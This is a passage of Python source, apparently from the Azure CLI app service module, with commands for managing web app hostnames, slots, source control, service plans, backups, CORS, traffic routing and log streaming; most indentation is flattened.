added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
    # 'settings' is a list of {'name': ..., 'value': ...} dicts; blank out credential values
    for setting in settings:
        if setting.get('name') in APPSETTINGS_TO_MASK:
            setting['value'] = None
    return settings
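# Illustrative sketch (comment only, not executed): given the list-of-dict shape returned by
# _filter_for_container_settings, the masking above blanks only the registry password value.
# The sample data is hypothetical.
#
#   settings = [{'name': 'DOCKER_REGISTRY_SERVER_URL', 'value': 'https://myacr.azurecr.io'},
#               {'name': 'DOCKER_REGISTRY_SERVER_PASSWORD', 'value': 's3cret'}]
#   _mask_creds_related_appsettings(settings)
#   # -> the DOCKER_REGISTRY_SERVER_PASSWORD entry now carries 'value': None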
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(location=webapp.location, site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name, webapp.name, hostname, binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name, webapp.name, hostname, binding,
slot)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
    # the logic here is ported from the portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
if 'functionapp' in site.kind:
raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
slot_def.site_config = SiteConfig()
poller = client.web_apps.create_or_update_slot(resource_group_name, webapp, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' function app doesn't exist".format(name))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
poller = client.web_apps.create_or_update_slot(resource_group_name, name, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings.properties, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings.properties, slot, client)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, cd_app_type=None,
app_working_dir=None, nodejs_task_runner=None, python_framework=None,
python_version=None, cd_account_create=None, cd_project_url=None, test=None,
slot_swap=None, private_repo_username=None, private_repo_password=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
if cd_project_url:
# Add default values
cd_app_type = 'AspNet' if cd_app_type is None else cd_app_type
python_framework = 'Django' if python_framework is None else python_framework
python_version = 'Python 3.5.3 x86' if python_version is None else python_version
        webapp_list = None if test is None else list_webapp(cmd, resource_group_name)
vsts_provider = VstsContinuousDeliveryProvider()
cd_app_type_details = {
'cd_app_type': cd_app_type,
'app_working_dir': app_working_dir,
'nodejs_task_runner': nodejs_task_runner,
'python_framework': python_framework,
'python_version': python_version
}
try:
status = vsts_provider.setup_continuous_delivery(cmd.cli_ctx, resource_group_name, name, repo_url,
branch, git_token, slot_swap, cd_app_type_details,
cd_project_url, cd_account_create, location, test,
private_repo_username, private_repo_password, webapp_list)
except RuntimeError as ex:
raise CLIError(ex)
logger.warning(status.status_message)
return status
non_vsts_params = [cd_app_type, app_working_dir, nodejs_task_runner, python_framework,
python_version, cd_account_create, test, slot_swap]
if any(non_vsts_params):
        raise CLIError('The following parameters are only valid when --cd-project-url is specified: ' +
                       'cd_app_type, app_working_dir, nodejs_task_runner, python_framework, ' +
                       'python_version, cd_account_create, test, slot_swap')
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
            # for non-server errors (not 50x), just throw; otherwise retry up to 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
    Update the source control token cached in the Azure app service. If no token is provided,
    the command will clear the existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
site_config = SiteConfigResource(location=location)
site_config.scm_type = 'LocalGit'
if slot is None:
client.web_apps.create_or_update_configuration(resource_group_name, name, site_config)
else:
client.web_apps.create_or_update_configuration_slot(resource_group_name, name,
site_config, slot)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
    except CloudError as ex:  # because of a bad spec, the SDK throws on 200; swallow it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites"
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
app_service_environment=None, sku='B1', number_of_workers=None, location=None,
tags=None, no_wait=False):
sku = _normalize_sku(sku)
_validate_asp_sku(app_service_environment, sku)
if is_linux and hyper_v:
raise CLIError('usage error: --is-linux | --hyper-v')
client = web_client_factory(cmd.cli_ctx)
if app_service_environment:
if hyper_v:
            raise CLIError('Windows containers are not yet supported in an App Service Environment')
ase_id = _validate_app_service_environment_id(cmd.cli_ctx, app_service_environment, resource_group_name)
ase_def = HostingEnvironmentProfile(id=ase_id)
ase_list = client.app_service_environments.list()
ase_found = False
for ase in ase_list:
if ase.id.lower() == ase_id.lower():
location = ase.location
ase_found = True
break
if not ase_found:
raise CLIError("App service environment '{}' not found in subscription.".format(ase_id))
else: # Non-ASE
ase_def = None
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
    # the API is odd about parameter naming; we have to live with it for now
sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
return sdk_no_wait(no_wait, client.app_service_plans.create_or_update, name=name,
resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None):
if number_of_workers is None and sku is None:
logger.warning('No update is done. Specify --sku and/or --number-of-workers.')
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
instance.sku = sku_def
return instance
def update_functionapp_app_service_plan(instance, sku=None, number_of_workers=None, max_burst=None):
instance = update_app_service_plan(instance, sku, number_of_workers)
if max_burst is not None:
if not is_plan_elastic_premium(instance):
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
instance.maximum_elastic_worker_count = max_burst
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
number_of_workers, min_val=0, max_val=20)
return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups',
slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(db_name, db_type, db_connection_string)
backup_request = BackupRequest(backup_request_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except DefaultErrorResponseException:
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(db_name, db_type, db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(db_name, db_type, db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
if any([source_resource_group, source_name]):
raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(db_name, db_type, db_connection_string):
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
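# Illustrative sketch (comment only): _create_db_setting is all-or-nothing; the values below
# are hypothetical.
#
#   _create_db_setting('mydb', 'SqlAzure', 'Server=...;Database=mydb')
#   # -> [DatabaseBackupSetting(database_type='SqlAzure', name='mydb', connection_string=...)]
#   _create_db_setting('mydb', None, None)
#   # -> CLIError: usage error: --db-name NAME --db-type TYPE --db-connection-string STRING
#   _create_db_setting(None, None, None)
#   # -> None (no database settings attached to the backup)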
def _parse_frequency(frequency):
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
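# Illustrative sketch (comment only): frequency strings combine a count with a 'd' or 'h' suffix.
#
#   _parse_frequency('7d')   # -> (7, FrequencyUnit.day)
#   _parse_frequency('12h')  # -> (12, FrequencyUnit.hour)
#   _parse_frequency('12m')  # -> CLIError (unit must be 'd' or 'h')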
def _get_location_from_resource_group(cli_ctx, resource_group_name):
from azure.cli.core.profiles import ResourceType
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
group = client.resource_groups.get(resource_group_name)
return group.location
def _get_location_from_webapp(client, resource_group_name, webapp):
webapp = client.web_apps.get(resource_group_name, webapp)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp))
return webapp.location
def _get_deleted_apps_locations(cli_ctx):
from azure.cli.core.profiles import ResourceType
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
web_provider = client.providers.get('Microsoft.Web')
del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None)
if del_sites_resource:
return del_sites_resource.locations
return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
for host in webapp.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def set_deployment_user(cmd, user_name, password=None):
'''
    Update deployment credentials. (Note: all webapps in your subscription will be impacted.)
'''
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_credentials', slot)
return content.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot)
full_xml = ''
for f in content:
full_xml += f.decode()
    profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
    converted = []
    if not isinstance(profiles, list):  # a single profile parses to a dict rather than a list
        profiles = [profiles]
    for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
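# Illustrative sketch (comment only): xmltodict prefixes XML attributes with '@', which the loop
# above strips. A hypothetical profile entry
#   {'@profileName': 'mysite - Web Deploy', '@publishUrl': 'mysite.scm.azurewebsites.net:443'}
# is converted to
#   {'profileName': 'mysite - Web Deploy', 'publishUrl': 'mysite.scm.azurewebsites.net:443'}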
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
if credentials:
cd_url = credentials.scm_uri + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
    url = site.enabled_host_names[0]  # picks the custom domain URL in case a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob support
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
SiteLogsConfig, HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging is not None:
if not application_logging:
level = 'Off'
elif level is None:
level = 'Error'
fs_log = FileSystemApplicationLogsConfig(level=level)
application_logs = ApplicationLogsConfig(file_system=fs_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
        # TODO: az blob storage log config is currently not in use; it will be implemented later.
# Tracked as Issue: #4764 on Github
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
            # 100 MB max log size, 3-day retention; hard-coded here, just as the portal does
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config, slot)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
if action == 'swap':
poller = client.web_apps.swap_slot_slot(resource_group_name, webapp,
slot, (target_slot or 'production'), True)
return poller
if action == 'preview':
if target_slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name,
webapp, slot, True)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp,
slot, target_slot, True)
return result
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_split = site.default_host_name.split('.', 1)
host_name_suffix = '.' + host_name_split[1]
host_name_val = host_name_split[0]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
action_host_name_slot = host_name_val + "-" + slot
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
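# Illustrative sketch (comment only): each distribution entry is '<slot>=<percentage>'. For a
# hypothetical app 'mysite' with default host 'mysite.azurewebsites.net':
#
#   set_traffic_routing(cmd, 'myrg', 'mysite', ['staging=20'])
#   # -> adds RampUpRule(action_host_name='mysite-staging.azurewebsites.net',
#   #                    reroute_percentage=20.0, name='staging'),
#   #    i.e. 20% of requests are rerouted to the 'staging' slot.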
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import certifi
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
                # extra encode()/decode() for a stdout encoding that does not support 'utf-8'
print(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace'), end='') # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
client = web_client_factory(cmd.cli_ctx)
